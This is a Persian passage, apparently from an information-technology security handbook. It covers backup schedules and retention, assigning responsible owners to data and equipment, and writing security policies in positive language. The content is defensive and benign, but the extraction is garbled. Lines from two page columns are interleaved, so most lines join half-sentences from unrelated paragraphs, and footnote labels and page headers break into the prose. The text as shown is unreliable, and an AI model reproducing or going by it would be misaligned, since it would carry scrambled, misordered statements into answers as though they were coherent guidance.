ﺻﻮﺭﺗﻲ ﻋﻤﻠﻴﺎﺕ ﻋﺎﺩﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﺒﺎﻳﺪ ﻛﻤﺘﺮ ﺍﺯ ﻳﻜﺒﺎﺭ
ﻼ ﻳﻚ ﻧﻤﻮﻧﻪ ﺭﺍﻫﺒﺮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ:
ﺫﻳ ﹰ
ﺩﺭ ﻫﺮ ﻫﻔﺘﺎﺩ ﻭ ﺩﻭ ﺳﺎﻋﺖ ﺍﻧﺠﺎﻡ ﺷﻮﺩ .ﻫﻤﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳـﺪ
78 Authentication Token
ﺣﺪﺍﻗﻞ ﺑﺮﺍﻱ ﻳﻚ ﺩﻭﺭﺓ ﺷﺶ ﻣﺎﻫﻪ ﺣﻔﻆ ﺷﻮﻧﺪ؛ ﻭ ﺍﺯ ﺍﻭﻟﻴﻦ
79 Smart Card ﭘﺸﺘﻴﺒﺎﻥ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ ﻫﺮ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ ﻣﺤـﻞ
80 Biometric
١٥١ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺗﻨﻬﺎ ﻛﺎﺭﻫﺎﻳﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛﻪ ﻣﺎﻳﻠﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺁﻧﺮﺍ ﺍﻧﺠﺎﻡ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺩﻫﻨﺪ .ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﺍﺣﺘـﺮﺍﻡ ﺑﮕﺬﺍﺭﻳـﺪ. ﺍﺯ ﺑﺮﻧﺎﻣــﺔ " "dumpﺗﻬﻴــﻪ ﺷــﻮﻧﺪ .ﺗﻬﻴــﺔ ﭘــﺸﺘﻴﺒﺎﻥ ﺍﺯ
ﭼﻨﺎﻧﭽﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﺷﺪﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻳﺎ ﺧﻮﺩﺗـﺎﻥ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ۲۴ﺳﺎﻋﺖ ﺷـﺒﺎﻧﻪﺭﻭﺯ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺭﻓﻊ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﺳﺮﻳﻌﹰﺎ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻴﺪ .ﺑﻪ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻧﻤﻲﺷﻮﺩ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﺷﺐ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛـﺎﺭﺑﺮﻩ ﺍﻧﺠـﺎﻡ
ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻢ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻳﺪ .ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺷﻮﺩ .ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ۲۴ﺳﺎﻋﺘﻪ ﺩﺭﺣـﺎﻝ
ﺑﭙﺬﻳﺮﻳﺪ ﻭ ﻫﻤﻴﺸﻪ ﺧﻮﺩ ﺭﺍ ﻣﻌﺮﻓـﻲ ﻛﻨﻴـﺪ .ﺍﺯ ﻛﺎﺭﺗـﺎﻥ ﻟـﺬﺕ ﻓﻌﺎﻟﻴﺖ ﻫﺴﺘﻨﺪ ﺑﺎﻳـﺪ ﺩﺭ ﺯﻣـﺎﻥ ﻧﺰﺩﻳﻜﺘـﺮﻳﻦ ﺗﻐﻴﻴـﺮ ﺷـﻴﻔﺖ
ﺑﺒﺮﻳﺪ. ﻛﺎﺭﻱ ﺑﻪ ﻧﻴﻤﻪﺷﺐ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ )ﺯﻣﺎﻧﻲ ﻛﻪ ﺑﺎﺭ ﻛﺎﺭﻱ ﺳﻴـﺴﺘﻢ
ﺍﺯ ﻫﻤﻴﺸﻪ ﻛﻤﺘﺮ ﺍﺳﺖ( .ﺗﻤﺎﻡ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻼﻓﺎﺻـﻠﻪ
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻻﺯﻡ ﺍﺳﺖ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲﺗﺮ ﻛـﻪ ﺗﻮﺳـﻂ
ﭘﺲ ﺍﺯ ﻧﻮﺷﺘﻪ ﺷﺪﻥ ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺧﻮﺍﻧﺪﻩ ﺷـﻮﻧﺪ ﺗـﺎ ﺻـﺤﺖ
ﻳﻚ ﻣﺘﺨﺼﺺ ﺭﺳﻤﻲ ﻭ ﭼﻨﺪ ﻣﺸﺎﻭﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺷـﺪﻩ ﺭﺍ
ﺍﻃﻼﻋﺎﺕ ﻧﻮﺷﺘﻪﺷﺪﻩ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺪ.
ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎﻳﺘﺎﻥ ﺑﻜﺎﺭ ﺑﺮﻳﺪ .ﺳﻴﺎﺳﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑـﺎ
ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ ﺑـﺮﺍﻱ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ ﺩﺭ ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ ،ﭘـﺸﺘﻴﺒﺎﻥ
ﻣﻼﺣﻈﺎﺕ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻻﺯﻡ ﺍﺳـﺖ ﺑﻄـﻮﺭ ﻣﺠـﺰﺍ ﺩﺭ ﺳﻄﺢ ﺻﻔﺮ ٨١ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ .ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺳـﻄﺢ ۳ﺑﺎﻳـﺪ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ. ﺩﺭ ﺍﻭﻝ ﻭ ﭘﺎﻧﺰﺩﻫﻢ ﻫﺮ ﻣﺎﻩ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ .ﭘـﺸﺘﻴﺒﺎﻥ ﮔﻴـﺮﻱ
ﺳﻄﺢ ۵ﺑﺎﻳﺪ ﺷﺒﻬﺎﻱ ﻫﺮ ﺩﻭﺷﻨﺒﻪ ﻭ ﭘﻨﺞﺷﻨﺒﻪ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ،
ﺑﺨﺶ ﺳﻮﻡ
ﺗﺨﺼﻴﺺ ﻳﻚ ﻣﺴﺌﻮﻝ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﺸﺘﻴﺎﻥ ﺳﻄﺢ ﺻﻔﺮ ﻳﺎ ۳ﺩﺭ ﻫﻤﺎﻧﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ
ﻫﺮ ﺟﺰﺀ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ ﺑﺎﺷﺪ .ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ۷ﺑﺎﻳﺪ ﻳﻚ ﺷﺐ ﺩﺭ ﻣﻴﺎﻥ ﺗﻬﻴﻪ ﺷﻮﺩ،
ﮔﻴﺮﺩ ﺑﺎﻳﺪ ﻳﻚ ﻣﺴﺌﻮﻝ ﻣﻌﻴﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ" .ﻣﺴﺌﻮﻝ" ﻛﺴﻲ ﺍﺳﺖ ﻣﮕﺮ ﺩﺭ ﺍﻳﺎﻡ ﺗﻌﻄﻴﻼﺕ.
ﻛﻪ ﺩﺭ ﻗﺒﺎﻝ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ،ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ،ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻭ ﺳﺎﻳﺮ
ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺩﺭ ﻫﺮ ﻫﻔﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ
ﺟﻨﺒﻪﻫﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﺩ .ﺍﻭ ﻫﻤﭽﻨـﻴﻦ
ﺍﺯ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ ﻫﻔﺘـﻪ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺍﻧﺘﺨـﺎﺏ
ﻳﻜﻲ ﺍﺯ ﻛﺴﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺍﺳـﺖ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ
ﻣﻲﻛﻨﺪ ﺗﺎ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑـﺮﺍﻱ ﻛـﺴﺐ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺻﺤﻴﺢ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ،
ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋـﺎﺕ ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﺪ.
ﻣﻬﻤــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻣــﺴﺌﻮﻝ ﻣﺸﺨــﺼﻲ ﻧــﺪﺍﺭﺩ .ﺩﺭﻧﺘﻴﺠــﻪ
ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﻤﺎﺭﻳﻬﺎﻱ ﺧﺎﺹ ﻭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﻭﻳـﮋﻩ ﺗﻬﻴـﻪ
ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺩﺍﻧﻨﺪ ﭼﻪ ﻛـﺴﻲ ﺩﺭﺑـﺎﺭﺓ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﺍﻃﻼﻋـﺎﺕ
ﻣﻲ ﺷﻮﻧﺪ؛ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮﻱ ﺗﻐﻴﻴﺮ
ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﭼﻪ ﻛﺴﻲ ﺿﻮﺍﺑﻂ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ
ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺷﺮﺍﻳﻂ ﻣﺘﻐﻴﺮ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺻـﺤﻴﺢ ﻣـﻨﻌﻜﺲ
ﺗﺪﻭﻳﻦ ﻣﻲﻧﻤﺎﻳﺪ .ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ )ﻭ ﻫﻤﭽﻨـﻴﻦ ﺗﺠﻬﻴـﺰﺍﺕ(
ﻛﻨﻨﺪ.
ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﻣﺘﻮﺟﻪ ﺷـﻮﺩ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﻃـﻮﻻﻧﻲ ﻧﺎﭘﺪﻳـﺪ
ﻣﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻝ ﺁﻧﻬﺎ ﻧﻴﺴﺖ ﻛﻪ ﺷﺮﺍﻳﻂ ﺭﺍ ﻛﻨﺘﺮﻝ
ﻧﻜﺎﺕ ﻛﻠﻴﺪﻱ ﺩﺭ ﺗﺪﻭﻳﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺁ
ﻛﻨﺪ.
ﻧﻘـﺶ ﺳﻴﺎﺳــﺖ )ﻭ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ( ﻛﻤــﻚ ﺑــﻪ
ﻣﺜﺒﺖ ﺑﺎﺷﻴﺪ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺭﻭﻳﻬﻤﺮﻓﺘﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺗﻠﻘـﻲ
ﺍﻓﺮﺍﺩ ﺑﻪ ﺟﻤـﻼﺕ ﻣﺜﺒـﺖ ﻭ ﺍﺛﺒـﺎﺗﻲ ﺑﻬﺘـﺮ ﺍﺯ ﺟﻤـﻼﺕ ﻣﻨﻔـﻲ ﻭ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﺳﻴﺎﺳﺘﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ
ﻋﺒﺎﺭﺍﺕ ﻧﻔـﻲﻛﻨﻨـﺪﻩ ﻭﺍﻛـﻨﺶ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫﻨـﺪ .ﺑﺠـﺎﻱ ﺗﻬﻴـﻪ ﻭﻳﮋﻩ ﻭ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ
ﻟﻴﺴﺘﻬﺎﻱ ﻃﻮﻳﻞ ﺍﺯ ﻋﺒﺎﺭﺗﻬﺎﻱ "ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﺪﻫﻴﺪ" ،ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﻣﺤﻴﻂ ﺷﻤﺎ ﻛﺎﻓﻲ ﺍﺳﺖ ،ﻣﺎﻧﻨﺪ ﻣﺜﺎﻝ ﺯﻳﺮ:
ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﺎﻥ ﺿﻮﺍﺑﻂ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺜﺒـﺖ ﺟﻤﻠـﻪﺑﻨـﺪﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻭﻇﻴﻔﺔ ﻫﻤـﻪ ﻣـﻲﺑﺎﺷـﺪ.
ﻧﻤﺎﻳﻴﺪ .ﺳﻴﺎﺳﺖ ﺧﻼﺻﺔ ﻗﺒﻠﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻣﺠﻤﻮﻋـﻪﺍﻱ
ﺍﺯ "ﻧﺒﺎﻳﺪﻫـﺎ" ﻣﻄـﺎﺑﻖ ﺯﻳـﺮ ﺗﻬﻴـﻪ ﻛـﺮﺩ؛ ﺍﻣـﺎ ﺑﺒﻴﻨﻴـﺪ ﻛـﻪ ﻫﻤـﺎﻥ
81 Level 0 dump
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ١٥٢
ﻫﻤــﻮﺍﺭﻩ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧــﻮ ،ﺗﻬﺪﻳــﺪﺍﺕ ﺟﺪﻳــﺪ ،ﺭﻭﺷــﻬﺎﻱ ﻧــﻮﻳﻦ ،ﻭ ﻋﺒﺎﺭﺗﻬﺎﻱ ﻗﺒﻠﻲ ﭼﻘﺪﺭ ﺭﺍﺣﺖﺗﺮ ﺧﻮﺍﻧﺪﻩ ﻣﻲﺷﺪﻧﺪ:
ﺍﻃﻼﻋــﺎﺕ ﺗــﺎﺯﻩ ﺑــﺮﺍﻱ ﻳــﺎﺩﮔﻴﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ .ﺍﮔــﺮ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺍﻳﻦ ﻭﻇﻴﻔﺔ ﺷﻤﺎﺳﺖ ﻛﻪ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﺓ
ﻫﻔﺘﻪﺍﻱ ۶۰ﺳﺎﻋﺖ ﺻﺮﻑ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻴﺎﻟﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ ﻧﺎﺩﺭﺳﺖ ﺑﺸﻮﺩ .ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺩﻭﺳﺖ ﻧﺪﺍﺭﻳﺪ ﺩﻳﮕﺮﺍﻥ ﺍﻧﺠـﺎﻡ
ﺷﺨﺼﻲ ﻭ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻨﻨـﺪ ،ﺑـﺎﺯﻫﻢ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺩﻫﻨــﺪ ﺭﺍ ﺍﻧﺠــﺎﻡ ﻧﺪﻫﻴــﺪ .ﺣــﺮﻳﻢ ﺧــﺼﻮﺻﻲ ﺩﻳﮕــﺮﺍﻥ ﺭﺍ
ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺳﺎﻻﻧﻪ ﺗﻨﻬﺎ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﻫﻔﺘـﻪ ﺗﺤـﺖ ﺁﻣـﻮﺯﺵ ﺧﺪﺷﻪﺩﺍﺭ ﻧﻜﻨﻴﺪ .ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﻭ ﻧﺘﻮﺍﻧـﺴﺘﻴﺪ ﺁﻧـﺮﺍ
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻛﺎﺭﺁﻳﻲ ﻧﺪﺍﺭﻧﺪ .ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﺑﻪ ﺁﻧﻬﺎ ﻓﺮﺻﺖ
ﺑﺮﻃﺮﻑ ﻛﻨﻴﺪ ،ﻣﺸﻜﻞ ﺭﺍ ﻣﺨﻔﻲ ﻧﮕﻪ ﻧﺪﺍﺭﻳﺪ .ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ
ﺗﺮﻗﻲ ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻃﻮﻝ ﻣﺪﺕ ﻛﺎﺭ ﺩﺍﺩﻩ ﺷﻮﺩ ﻭ ﺍﺟـﺎﺯﻩ ﺩﺍﺷـﺘﻪ
ﺑــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴــﺴﺘﻢ ﺭﺍ ﻧﻘــﺾ ﻧﻨﻤﺎﻳﻴــﺪ .ﺳــﻌﻲ ﻧﻜﻨﻴــﺪ
ﺑﺎﺷﻨﺪ ﺑﺠﺎﻱ ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ،ﻋﺼﺮ ﻫﺮ ﺭﻭﺯ ﻭ
ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﮔـﺮﺩﻥ ﺩﻳﮕـﺮﺍﻥ ﺑﻴﻨﺪﺍﺯﻳـﺪ؛ ﻭ
ﺗﻌﻄﻴﻼﺕ ﺁﺧﺮ ﻫﻔﺘـﻪ ﺭﺍ ﺑـﺎ ﺧـﺎﻧﻮﺍﺩﻩﻫﺎﻳـﺸﺎﻥ ﺳـﭙﺮﻱ ﻛﻨﻨـﺪ ،ﺍﺯ
ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻧﻨﻤﺎﻳﻴﺪ .ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺍﻭﻗـﺎﺕ ﺑـﺪﻱ
ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﺧﺮﺳﻨﺪﺗﺮ ﻭ ﺭﺍﺿﻲﺗﺮ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ!
ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺗﻮﺯﻳﻊ ﻛﻨﻴـﺪ .ﻳـﻚ ﺍﺻـﻞ ﺩﺭ
ﻭﻗﺘﻲ ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﻣﻲﻧﻮﻳﺴﻴﺪ ،ﻫﻤﻮﺍﺭﻩ ﺭﻓﺘﺎﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺫﻫـﻦ
ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﻣﻲﮔﻮﻳﺪ:
ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺁﻧﻬﺎ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﻜﺎﺕ ،ﺗﻌﺒﻴـ ﹺﺮ
ﺍﮔﺮ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻣﻨﻴﺖ ﺩﺍﺭﻳـﺪ ﻭﻟـﻲ ﺍﺧﺘﻴـﺎﺭﻱ ﺑـﺮﺍﻱ ﻧﺎﺩﺭﺳﺖ ﻣﻲﻛﻨﻨﺪ .ﺳﻴﺎﺳﺖ ﺷﻤﺎ ﻧﺒﺎﻳﺪ ﻃﻮﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ
ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻭ ﺗﻨﺒﻴﻪ ﻣﺘﺨﻠﻔﻴﻦ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﻧﺸﺪﻩ ﺍﺳﺖ ،ﻫﻨﮕـﺎﻡ ﺍﺷﺘﺒﺎﻩ ﻛﺎﺭﺑﺮﺍﻥ ،ﺁﻧﺎﻥ ﺭﺍ ﻣﺴﺘﺤﻖ ﻫﺮ ﻣﺠﺎﺯﺍﺗﻲ ﺑﺪﺍﻧﺪ.
ﻭﻗﻮﻉ ﻳـﻚ ﻣـﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﻳـﻦ ﺷـﻤﺎ ﻫـﺴﺘﻴﺪ ﻛـﻪ ﺳـﺮﺯﻧﺶ ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜـﻦ
ﻣﻲﺷﻮﻳﺪ. ﺍﺳﺖ ﺷـﺎﻣﻞ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﺎﺷـﻨﺪ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ
ﻫﺮ ﭼﻨﺪ ﺍﺻﻞ ﺑﺎﻻ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺑﺮﻗﺮﺍﺭ ﺍﺳﺖ ،ﺍﻣـﺎ ﻣـﺴﺌﻮﻟﻴﺖ ﺑﺨﻮﺍﻫﻨﺪ ﺗﺎ ﺣﺪﻭﺩﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺧﺼﻮﺻﻲ ﻧﮕﻬﺪﺍﺭﻧـﺪ .ﺍﻳـﻦ
ﻭﺍﻗﻌﻲ ﻣﺘﻮﺟﻪ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷـﺎﻣﻞ ﻧﺎﻣـﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﺗﻮﺯﻳﻊ ﻧﻜﺮﺩﻩ ﺍﺳﺖ. ﺳﻮﺍﺑﻖ ﺷﺨﺼﻲ ﻭ ﺍﺭﺯﺷﻴﺎﺑﻴﻬﺎﻱ ﺷﻐﻠﻲ ﺑﺎﺷﺪ .ﭘﺲ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ
ﻧﻴﺰ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ؛ ﻫﺮﭼﻨـﺪ ﺷـﺎﻳﺪ ﻧﺘﻮﺍﻧﻴـﺪ
ﺍﻳﻦ ﺑﺨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻛﻨﺎﻧﻲ ﺍﺳـﺖ
